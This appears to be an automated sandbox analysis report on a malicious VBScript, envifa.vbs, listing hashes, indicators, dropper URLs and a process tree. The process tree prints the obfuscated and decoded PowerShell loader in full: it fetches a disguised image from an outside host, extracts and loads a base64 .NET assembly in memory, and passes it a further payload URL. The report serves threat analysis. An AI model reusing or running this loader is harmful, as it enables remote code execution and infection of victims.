0bede06c4b670f1dff945866768c643ece0db8618cf042ffeeda9d88aad09880

General

Target

envifa.vbs
Size

151KB
MD5

64782d163bcd2fbbbf72bf768a4b57a4
SHA1

9feca15cae48fb30fc12cc241243e5294cf3b79f
SHA256

0bede06c4b670f1dff945866768c643ece0db8618cf042ffeeda9d88aad09880
SHA512

7c7b0c74fff9b480fd61b80903b8a8ed9a1124229e0922e286eb82146b630ecb95cc6b80fb24c72d72eed978dc1f6998e1d4f01f7806137b153692db17d0e033
SSDEEP

1536:sp9p9p9p9p9p9p9pu20WwCqPv3+NhlV9p9p9p9p9p9p9p9p5MTp9p9p9p9p9p9pL:d

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://uploaddeimagens.com.br/images/004/686/431/original/dll_vbe.jpg?1702073941

exe.dropper

https://uploaddeimagens.com.br/images/004/686/431/original/dll_vbe.jpg?1702073941

Signatures

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1212	powershell.exe
2744	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1212	powershell.exe
Token: SeDebugPrivilege	2744	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2224 wrote to memory of 1212	2224	WScript.exe	28
PID 2224 wrote to memory of 1212	2224	WScript.exe	28
PID 2224 wrote to memory of 1212	2224	WScript.exe	28
PID 1212 wrote to memory of 2744	1212	powershell.exe	30
PID 1212 wrote to memory of 2744	1212	powershell.exe	30
PID 1212 wrote to memory of 2744	1212	powershell.exe	30

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2224
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVQByDgTreGwDgTreIDgTreDgTre9DgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre2DgTreDgDgTreNgDgTrevDgTreDQDgTreMwDgTrexDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTreZDgTreBsDgTreGwDgTreXwB2DgTreGIDgTreZQDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre3DgTreDDgTreDgTreMgDgTrewDgTreDcDgTreMwDgTre5DgTreDQDgTreMQDgTrenDgTreDsDgTreJDgTreB3DgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTregDgTreD0DgTreIDgTreBODgTreGUDgTredwDgTretDgTreE8DgTreYgBqDgTreGUDgTreYwB0DgTreCDgTreDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBODgTreGUDgTredDgTreDgTreuDgTreFcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreDsDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreCQDgTredwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreLgBEDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreRDgTreBhDgTreHQDgTreYQDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFUDgTrecgBsDgTreCkDgTreOwDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBSDgTreGUDgTreZgBsDgTreGUDgTreYwB0DgTreGkDgTrebwBuDgTreC4DgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreF0DgTreOgDgTre6DgTreEwDgTrebwBhDgTreGQDgTreKDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBDDgTreGwDgTreYQBzDgTreHMDgTreTDgTreBpDgTreGIDgTrecgBhDgTreHIDgTreeQDgTrezDgTreC4DgTreQwBsDgTreGEDgTrecwBzDgTreDEDgTreJwDgTrepDgTreDsDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreUgB1DgTreG4DgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTreJgBiDgTreDIDgTreMDgTreDgTrewDgTreDkDgTreMDgTreBkDgTreDcDgTreMwBjDgTreDgDgTreZDgTreBkDgTreGYDgTreMwDgTre4DgTreDkDgTreZDgTreBiDgTreGMDgTreNgDgTrexDgTreDQDgTreMwDgTre5DgTreDIDgTreYQDgTrezDgTreGIDgTreMDgTreDgTre5DgTreGYDgTreYQBhDgTreDQDgTreNQDgTrexDgTreDQDgTreZgDgTreyDgTreGYDgTreNgDgTre1DgTreDIDgTreMDgTreDgTre1DgTreGIDgTreNgBkDgTreGEDgTreOQBlDgTreDEDgTreMDgTreDgTre3DgTreDcDgTreYwDgTrewDgTreDcDgTreNwDgTreyDgTreGIDgTreNQBlDgTreD0DgTrebQBoDgTreCYDgTreMQDgTrezDgTreDcDgTreMwDgTre3DgTreDcDgTreNQDgTre2DgTreD0DgTrecwBpDgTreCYDgTreMQDgTrezDgTreGMDgTreYQDgTre5DgTreDgDgTreNQDgTre2DgTreD0DgTreeDgTreBlDgTreD8DgTredDgTreB4DgTreHQDgTreLgBpDgTreGkDgTreaQBpDgTreHMDgTrecwBvDgTreGMDgTrebQBlDgTreHIDgTreLwDgTrewDgTreDMDgTreNwDgTrezDgTreDIDgTreNDgTreDgTre2DgTreDMDgTreMgDgTre1DgTreDMDgTreOQDgTre1DgTreDDgTreDgTreODgTreDgTrezDgTreDgDgTreMQDgTrexDgTreC8DgTreNQDgTrezDgTreDkDgTreNDgTreDgTre0DgTreDQDgTreNwDgTrezDgTreDMDgTreMgDgTre3DgTreDYDgTreNQDgTrewDgTreDgDgTreMwDgTre4DgTreDEDgTreMQDgTrevDgTreHMDgTredDgTreBuDgTreGUDgTrebQBoDgTreGMDgTreYQB0DgTreHQDgTreYQDgTrevDgTreG0DgTrebwBjDgTreC4DgTrecDgTreBwDgTreGEDgTreZDgTreByDgTreG8DgTreYwBzDgTreGkDgTreZDgTreDgTreuDgTreG4DgTreZDgTreBjDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDIDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGcDgTrebwBvDgTreGcDgTrebDgTreBlDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTre0DgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreDoDgTreXDgTreBQDgTreHIDgTrebwBnDgTreHIDgTreYQBtDgTreEQDgTreYQB0DgTreGEDgTreXDgTreDgTrenDgTreCwDgTreIDgTreDgTrenDgTreGcDgTrebwBvDgTreGcDgTrebDgTreBlDgTreCcDgTreKQDgTrepDgTreDgTre==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1212
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/686/431/original/dll_vbe.jpg?1702073941';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('ClassLibrary3.Class1');$method = $type.GetMethod('Run').Invoke($null, [object[]] ('&b20090d73c8ddf389dbc614392a3b09faa4514f2f65205b6da9e1077c0772b5e=mh&13737756=si&13ca9856=xe?txt.iiiissocmer/0373246325395083811/5394447332765083811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '' , '2' , 'google' , '4' , 'C:\ProgramData\', 'google'))"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2744

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
bddb479b6fee8a314bbba8ccc64b2f4b

SHA1
61b015e2d6a24e05558f726eeb1c99241491f38d

SHA256
3de92677d0e88b7c5c909e10bb4d4e7329e905ff387fb23704980b219fd8de14

SHA512
5678079a84b47cb3d824be27493fe19e8d63be6775d542e0147e61aedf13443a3c75785cca436da7b4422604b4e2424933e92605445e56b2354c0fa710bbf381

Download Submit
memory/1212-11-0x0000000002D90000-0x0000000002E10000-memory.dmp

Filesize
512KB

Download
memory/1212-4-0x000000001B6B0000-0x000000001B992000-memory.dmp

Filesize
2.9MB

Download
memory/1212-7-0x0000000002D90000-0x0000000002E10000-memory.dmp

Filesize
512KB

Download
memory/1212-5-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/1212-8-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp

Filesize
9.6MB

Download
memory/1212-10-0x0000000002D90000-0x0000000002E10000-memory.dmp

Filesize
512KB

Download
memory/1212-6-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp

Filesize
9.6MB

Download
memory/1212-24-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp

Filesize
9.6MB

Download
memory/1212-20-0x0000000002D90000-0x0000000002E10000-memory.dmp

Filesize
512KB

Download
memory/2744-19-0x0000000002C90000-0x0000000002D10000-memory.dmp

Filesize
512KB

Download
memory/2744-22-0x0000000002C90000-0x0000000002D10000-memory.dmp

Filesize
512KB

Download
memory/2744-21-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp

Filesize
9.6MB

Download
memory/2744-18-0x0000000002C90000-0x0000000002D10000-memory.dmp

Filesize
512KB

Download
memory/2744-17-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp

Filesize
9.6MB

Download
memory/2744-23-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp

Filesize
9.6MB

Download
memory/2744-16-0x0000000002C90000-0x0000000002D10000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing